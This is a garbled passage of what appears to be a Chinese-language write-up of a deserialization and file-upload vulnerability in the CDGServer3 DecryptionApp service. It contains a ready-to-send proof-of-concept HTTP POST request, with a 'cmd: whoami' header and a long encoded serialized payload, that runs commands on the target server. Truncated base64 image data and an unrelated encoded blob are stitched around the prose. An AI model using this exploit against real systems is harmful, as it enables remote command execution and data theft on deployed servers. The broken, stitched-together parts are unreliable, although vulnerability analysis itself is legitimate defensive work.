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
<p blockindex=19><strong>分析</strong>：该部分的内容就是将模板名称、标志位以及之前的文件列表字符串设置到工作流对象flow对象中，接着就是进行sql数据库的连接以及调用<code>flowDao</code>的<code>addFlow</code>方法将<code>flow</code>对象添加到数据库。如果操作成功最后将我们的数据以XML的形式反应给前端</p>
<h2 blockindex=20>总结</h2>
<p blockindex=21>该漏洞的形成利用了两个点</p>
<ol blockindex=22>
<li>在对前端输入的内容中，没有对文件的内容等方法方面进行相关的限制，导致可以上传任意的文件</li>
<li>Flow类中继承了<code>serialize</code>接口，我们在上传的参数中若存在序列化的内容即可利用它来进行反序列操作，进而造成相关数据的窃取</li>
</ol>
<h2 blockindex=23>漏洞复现</h2>
<p blockindex=24><strong>poc</strong></p>
<p blockindex=25>POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1</p>
<p blockindex=26>Host: your-ip</p>
<p blockindex=27>User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36</p>
<p blockindex=28>Accept-Encoding: gzip, deflate, br</p>
<p blockindex=29>Connection: close</p>
<p blockindex=30>Content-Type: text/xml</p>
<p blockindex=31>cmd: whoami</p>
<p blockindex=32>​</p>
<p blockindex=33>NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEP
<p blockindex=34><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACSoAAAWWCAYAAACBvgt3AAABG2lUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4KPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNi4wLjAiPgogPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4KICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIi8+CiA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgo8P3hwYWNrZXQgZW5kPSJyIj8+l1vpCgAAAAlwSFlzAAAWJQAAFiUBSVIk8AAAIABJREFUeJzs3Xd8FHX+P/DXlK1pEEoSIBt6r0FqAJUiINgVUVDR0/NOvdPz7vTufle+3ql3era7s5xXrKiADQUPsKCCoQqh95YNJYWSunXK74/JbrLZkoRkCYTX8/Hw4e5nPjPz2WXLZOc174/g8Xh0EBERERERERERERERERERERERxZHY0gMgIiIiIiIiIiIiIiIiIiIiIqLWj0ElIiIiIiIiIiIiIiIiIiIiIiKKOwaViIiIiIiIiIiIiIiIiIiIiIgo7hhUIiIiIiIiIiIiIiIiIiIiIiKiuGNQiYiIiIiIiIiIiIiIiIiIiIiI4o5BJSIiIiIiIiIiIiIiIiIiIiIiijsGlYiIiIiIiIiIiIiIiIiIiIiIKO7k8kp/S4+BiIiIiIiIiIiIiIiIiIiIiIhaOVZUIiIiIiIiIiIiIiIiIiIiIiKiuBM8Ho8eq0Og4lKHdonnZEBERERERERERERERERERERERNT6sKISERERERERERERERERERERERHFHYNKREREREREREREREREREREREQUdwwqERERERERERERERERERERERFR3DGoREREREREREREREREREREREREccegEhERERERERERERERERERERERxR2DSkREREREREREREREREREREREFHcMKhERERERERERERERERERERERUdwxqERERERERERERERERERERERERHHHoBIREREREREREREREREREREREcUdg0pERERERERERERERERERERERBR3DCoREREREREREREREREREREREVHcMahERERERERERERERERERERERERxx6ASERERERERERERERERERERERHFHYNKREREREREREREREREREREREQUdwwqERERERERERERERERERERERFR3DGoREREREREREREREREREREREREccegEhERERERERERERERERERERERxR2DSkREREREREREREREREREREREFHcMKhERERERERERERERERERERERUdwxqERERERERERERERERERERERERHHHoBIREREREREREREREREREREREcUdg0pERERERERERERERERERERERBR3DCoREREREREREREREREREREREVHcyS09gGi043vg3/klVOcWqGXHAE1p6SERnTuiDCmlMyTHUJgGTIbYqW9Lj4iIiIiIiIiIiIiIiIjizK+o8HoV+PwKNBXQobf0kEIIECBKgNkkw2KRYZKluO6Pz0coPh/xwWwC0bkleDyemJ9e5ZV+AECHdonnZEAA4P3iRfi2fnLO9kd0vjMPuQaWKQ+09DCIiIiIiIiIiIiIiIgoTiqrvHB7/C09jEaxWU1ITLDEZdt8PkLx+YgPZhOIzr3zLqjk+fC38B9ef072RXQhMXUbBesNj7f0MIiIiIiIiIiIiIiIiKiZlZW74fOrAAC7zQSLWYZ8nlajURQVXp8Cl9s4j2w2SUhJtjXrPvh8hOLzER/MJhC1DLGlB1Cb94sX+UFAFIX/8Hp4v3ixpYdBREREREREREREREREzaiyygufX4UkCWibYkOC3XLehlAAQJYlJNgtaJtigyQJ8PlVVFZ5m237fD5C8fmID2YTiFrOeRNU0o7vYUk1onr4tn4C7fielh4GERERERERERERERERNQO/ogan80pOtJ7XAZS6ZFlCcqIVAOD2+OFX1CZvk89HKD4f8cFsAlHLOm+CSv6dX7b0EIguCHyvEBERERERERERERERtQ5erwLAmM7rQgqhBMiyBLvNBKDmsTQFn49QfD7ig+dbiVrWeRNUUp1bWnoIRBcEvleIiIiIiIiIiIiIiIhaB5/fCG9YzHILj+TsBcYeeCxNwecjFJ+P+OD5VqKWdf4ElcqOtfQQiC4IfK8QERERERERERERERG1Dlr1bFgXYrWcgMDYtWaY2YvPRyg+H/HB861ELeu8CSpBO38SlETnNb5XiIiIiIiIiIiIiIiIWgUdeksPodk0x2Ph89H82zhfnFePhedbiVrU+RNUIiIiIiIiIiIiIiIiIiIiIiKiVotBJSIiIiIiIiIiIiIiIiIiIiIiiju5pQdARERERERERERERERERETnltN5AqvWbIHTWQgAcDjSkZWZjvE5w1p4ZPE1f8Gyi+JxEhGdrxhUIiKi84JfUeH1KvD5FWhq0+cqFiBAlACzSYbFIsMkS800UiIiIiIiIiIiIiKiC9vq3Dyszt0S0uZ0FgZDS601xDN/wbLg48wvKMTc2dNbekhxFQijRdKYsJbTeQIAkF9QiKzMdDgcGc02RgKsOfOgFGyD4tzcYmOQOw2ClDUMqDoD77YlcduPNWcepE79oRzZBO/GhRBTMmAZNQeelS9BV9xx229rZRkxG6I9Bd4dn0M7dThkmdxlMOQBU6GfOQrvhveC7dbL7wfMdvg2LoJ2Oj/m9s0DpkHuPgJa8SF41r/T8IEJEqSOvSB1HgjtdD6UIxtDx9bwLdHZkB3ZLfqBQkR0Iais8sLt8TfrNnXoUFXArfrh9vhhs5qQmGBp1n0QEREREREREREREV1oaoeU5s6eFgydBNpX525plWGUQEgpwOksxPwFy1ptWKnu463L6aw/dLQ6Nw/5BYWh28kZ2upeGy1JdmTDNGYOAJyTXIFt0oMQM3pDObQR3jVv1IwjczBMObdBKz4c16CS2L4bxKxhEF1lgCDAfvXvIaT1hL1DV7g+/C10T2nc9t0amQZNg5DaGcqxXWFBJbFtJkyDroB6dAdQK6hk6ncZYG8DdddX9QaVxI49IPWZAMGSCNQNKpkTINpSINrbQLC1gWBLgdg2A1Kn/hAz+gIm47ysXl6Eqv/eCV2tORfMoFIcyI5smMfMhZQ5KNhW8cyU5t+RKAOaEn25IAG62vz7rYdgTYbuKT/n+20WgmA8b4Dx3OlNq+hCRPUrK3fD5zc+q+w2EyxmGXIzVT9SFBVenwKX2wgrqaqGlGRbs2ybALVgOwBAK9gWbBMzB4d8/xERERERERERERHR+SW/IFA1KTRwMj5nGLIy0zF/wXKsWrMFc1tRGCUQ2nE40kOmumutYaXVuXnBxzl39rSo/WIFjuoGnRyOdEwY27IhpbKyMgBASkpKi42huZnHzAUAKLXOtcSNKEPqNwGCNRli4f747y8SXQMACJIM6Dpcn/0F9hufgJjRBwm3PIeqt34EXfW1zNhagCBbYLv2MQCAsnMlfLs/b9L2rOPuhtxrbPUdOwBASu+FxDtfq+lkSwYAWKY/DIvfeK7VkoNwL32iwftJmPUMRMeQ+ju6zkA7eQRiWwfUkweDzQwqNZNI4aS6y88qASlIEOwp0KtOhy2yTbgH8tAZ0MuK4duwCL6dy4PLzAOvhHnEjXB98li9KbjgOgOmQXeVwn94XdQ+YmJHmEfcBADwfP1S+HAtiUi8911oJYfh3/0VfHmLY+7T1HcSAB3+PSsbNEbZkQ3bTX8GAPjzlsCz8sUGrddQpm6jYL3+TwAA5cAauBf/wWjPzIY86Ap4Pn8OunLxfDASxVtllRc+vwpJEpCcaG22gFKALEuQZQkWs4zySg9
<h3 blockindex=35>poc的分析</h3>
<p blockindex=36>相信大家在这里或多或少对这个poc不大理解，我们对该poc分析一下</p>
<p blockindex=37>我们使用工具对该poc进行解码操作，得到如下内容</p>
<p blockindex=38><img src="data:image/png;base64,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